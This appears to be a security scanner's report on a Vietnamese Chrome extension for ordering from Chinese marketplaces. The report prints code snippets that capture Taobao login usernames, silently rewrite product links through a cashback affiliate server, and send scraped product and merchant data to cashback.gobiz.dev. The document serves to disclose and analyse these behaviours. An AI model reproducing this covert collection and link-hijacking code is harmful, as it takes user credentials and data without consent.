Công cụ đặt hàng của nhapsitrungquoc.com

Công cụ đặt hàng của nhapsitrungquoc.com

ID: jkglaffcmkcgeemgpjgfjdmolleokfol

Supported Languages

🇻🇳Vietnamese

Extension Info & Metadata

Status
Active
Version
2.0912.1726
Size
4.13 MB
Rating
0.0/5
Reviews
0
Users
42
Type
Extension
Updated
Oct 5, 2023
Category
Shopping
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
Yes

Publisher Contextual Analysis

Trusted
Author
developer-gobizView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Website
Visit
Total Extensions
42
Active
16
Obsolete
26
Listed
42
Unlisted
0
Total Users
2,220
Screenshot 1
Screenshot 2
Screenshot 3

Công cụ đặt hàng của nhapsitrungquoc.com trên trình duyệt Chrome và Cốc Cốc

Công cụ đặt hàng của nhapsitrungquoc.com trên trình duyệt Chrome và Cốc Cốc Công cụ hỗ trợ khách hàng mua sắm trên các trang thương mại điện tử của Trung Quốc với các chức năng như: Đặt hàng dễ dàng hơn trên trang 1688.com Tự động điền địa chỉ kho Trung Quốc theo mã khách hàng trên hệ thống của nhapsitrungquoc Được chọn kho nhận hàng tại Trung Quốc (Quảng Châu, Bằng Tường hoặc Đông Hưng) Tạo yêu cầu thanh toán Alipay tự động khi đặt hàng 1688 Tự động dịch nội dung trên website, hỗ trợ bạn chọn lựa sản phẩm tốt hơn Kết nối đơn mua hàng 1688 với hệ thống nhapsitrungquoc để theo dõi trạng thái đơn hàng Dịch vụ UỶ THÁC THANH TOÁN KẾT HỢP VẬN CHUYỂN 1688 của nhapsitrungquoc: Quý khách được mượn tài khoản doanh nghiệp 1688 level 6 để đặt hàng với mức chiết khấu tốt nhất từ người bán, không lo bị khóa alipay, tài khoản đặt hàng. Chủ động trong việc giao dịch & đàm phán với NCC Trung Quốc Miễn hoàn toàn phí ủy thác thanh toán Tỷ giá cạnh tranh, ưu đãi hơn thị trường Thanh toán số tiền đúng theo giá trị hàng hóa đặt mua của người bán, không bị phát sinh phí phụ trội như khi nhập hàng qua dịch vụ order. Phí vận chuyển quốc tế thấp nhất chỉ từ 7,5k/kg Liên hệ ngay với Nhapsitrungquoc để tối ưu chi phí nhập hàng ngay hôm nay! Zalo: +8615977184245 Website: nhapsitrungquoc.com

Item
Type
Severity
Description
scripting
Permission
Critical
This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to.
<all_urls>
Host
Critical
Broad host access — the extension can read/modify content on every website.
Broad Host Permissions
Risk Factor
High
This extension has broad host permissions allowing it to access many or all websites.
Broad Content Script Access
Risk Factor
High
This extension can inject scripts into any website.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
activeTab
Permission
Medium
This permission grants temporary access to the current tab. Rated Medium because it can access current page content when invoked, though limited to user-initiated actions.

The extension intercepts the Taobao login form, reads the user's account username at the moment of submission, and stores it in chrome.storage.local under 'taobaoLoginUsername'. This credential collection is entirely undisclosed — CWS declares no data collection, the extension description never mentions it, and storing login credentials is not required for the declared purpose of auto-filling shipping addresses or creating Alipay payment requests. The stored value is accessible to any content script the extension later injects.

contentLogin.js (Line 1)
// On login.taobao.com — polls for presence of #fm-login-id input// Attaches click listener to submit buttondocument.querySelector('.fm-submit').addEventListener('click', function() {  var username = document.querySelector('#fm-login-id').value;  chrome.storage.local.set({    taobaoLoginUsername: username  });});

On every page load across all URLs, the extension collects all anchor hrefs matching Taobao, 1688, Tmall, and yangkeduo product or order URLs, batches them, and sends them via Server-Sent Events POST to cashback.gobiz.dev with the tenant identifier 'shippo-cb'. The server returns replacement URLs which are silently written back into the DOM, replacing every matched link before the user clicks. This is affiliate link hijacking: user purchases are invisibly routed through gobiz's cashback affiliate system without any disclosure, opt-in, or user-visible indication that their links have been modified.

contentScriptLink.js (Line 2214)
window.addEventListener("load", (function() {  var t = window.location.href;  t.match(/order.1688.com\/order\/smart_make_order.htm/) || t.match(    /buy.tmall.com\/order\/confirm_order/) || t.match(/buy.tmall.hk\/order\/confirm_order/) || t.match(    /buy.taobao.com\/auction\//) || o()((function() {    // Collects all <a> tags whose href matches Taobao/1688/Tmall/yangkeduo product/order URLs    var i = new E("https://cashback.gobiz.dev/public/kui/shorten/generate_batch", {      headers: {        "Content-Type": "application/json",        "X-Tenant": "shippo-cb"      },      payload: a()(n),      method: "POST"    });    i.addEventListener("generate-batch-event", (function(t) {      var r = JSON.parse(t.data);      if (r.url) {        var n, e = document.getElementById(r.requestId);        e && (e.href = f()(n = r.url).call(n, "https://") < 0 ? "https://" + r.url : r.url)      }    })), i.stream()  }), 1e3)}))

Five seconds after every product page load across six marketplaces, the extension scrapes the complete product record — name, price, all SKU variants, current stock, total sales count, merchant identity and ratings, product images, and the canonical URL — and POSTs it to cashback.gobiz.dev/ingester/products tagged as collector type 'gobiz-linga'. This is systematic commercial product intelligence harvesting feeding a third-party database. CWS declares no data collection, so this behavior has no disclosure basis and occurs entirely without user awareness or consent.

contentProduct.js (Line 8548)
// Module 750 — runs on 1688, Taobao, Tmall, Shopee, BigC, Lazada, lala.best product pageswindow.addEventListener("load", (function() {  setTimeout((function() {    var t = a.getProductDetailInfo();    // t = { name, oid, salePrice, merchant: { oid, name, url, ratings },    //        skus, stock, totalSold, images, url, marketplace, brand }    // annotated: collector.type = "gobiz-linga"    n.default.post("https://cashback.gobiz.dev/ingester/products", [t])  }), 5e3)}))

On every merchant/shop page across supported marketplaces, the extension scrapes the full seller profile — including company name, physical address, registration ID, contact details, aggregated ratings, and total sales — and POSTs it to cashback.gobiz.dev/ingester/merchants five seconds after page load. Like the product scraper, this is undisclosed merchant intelligence collection building a commercial database at gobiz.dev. No user action triggers it; it fires silently on every shop page visit.

contentShop.js (Line 8548)
var i = r(402).ShopSpiderFactory.make(window.location.href);window.addEventListener("load", (function() {  setTimeout((function() {    var t = i.getShopInfo();    // t = full merchant profile: company name, logo, address, ratings,    //     total sold, company registration ID, store links, contact details    n.default.post("https://cashback.gobiz.dev/ingester/merchants", t)  }), 5e3)}))

By severity

Critical0
High4
Medium0
Low0

Versions scanned

Showing 1 of 7 scanned versions with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
2.0912.17264

Files with findings

4 distinct paths — top paths by unique finding count:

  • contentLogin.js1
  • contentProduct.js1
  • contentScriptLink.js1
  • contentShop.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Credential Theft
high
contentLogin.js (line 1)The extension intercepts the Taobao login form, reads the user's account username at the moment of submission, and stores it in chrome.storage.local under 'taobaoLoginUsername'. This credential collection is entirely …
2.0912.1726
2Tracking
high
contentScriptLink.js (line 2214)On every page load across all URLs, the extension collects all anchor hrefs matching Taobao, 1688, Tmall, and yangkeduo product or order URLs, batches them, and sends them via Server-Sent Events POST to cashback.gobiz…
2.0912.1726
3Unauthorized Data Collection
high
contentProduct.js (line 8548)Five seconds after every product page load across six marketplaces, the extension scrapes the complete product record — name, price, all SKU variants, current stock, total sales count, merchant identity and ratings, p…
2.0912.1726
4Unauthorized Data Collection
high
contentShop.js (line 8548)On every merchant/shop page across supported marketplaces, the extension scrapes the full seller profile — including company name, physical address, registration ID, contact details, aggregated ratings, and total sale…
2.0912.1726
URLs
406
IPv4
5
IPv6
1

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

tc39.es/ecma262/https://tc39.es/ecma262/#sec-requireobjectcoercible\nmodule.exports
tc39.es/ecma262/https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot-aec\nmodule.exports
tc39.es/ecma262/https://tc39.es/ecma262/#sec-iscallable\nmodule.exports
tc39.es/ecma262/https://tc39.es/ecma262/#sec-getmethod\nmodule.exports
github.com/zloirock/core-js/issues/86https://github.com/zloirock/core-js/issues/86#issuecomment-115759028\nmodule.exports
github.com/mozilla/rhino/issues/346/nhttps://github.com/mozilla/rhino/issues/346\n
tc39.es/ecma262/https://tc39.es/ecma262/#sec-object.prototype.propertyisenumerable\nexports.f
bugs.chromium.org/p/v8/issues/detailhttps://bugs.chromium.org/p/v8/issues/detail?id=3334\nmodule.exports
html.spec.whatwg.org/multipage/timers-and-user-prompts.htmlhttps://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#timers\nmodule.exports
html.spec.whatwg.org/multipage/timers-and-user-prompts.htmlhttps://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-settimeout\n
Showing 1 to 10 of 410 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

25.4.3.1
IPv4
-
2.78.92.88
IPv4
-
44.14.8.46
IPv4
-
1.12.28.28
IPv4
-
1.2.3.4
IPv4
-
1:2:3:4:5:6:7:8
IPv6
-
Showing 1 to 7 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.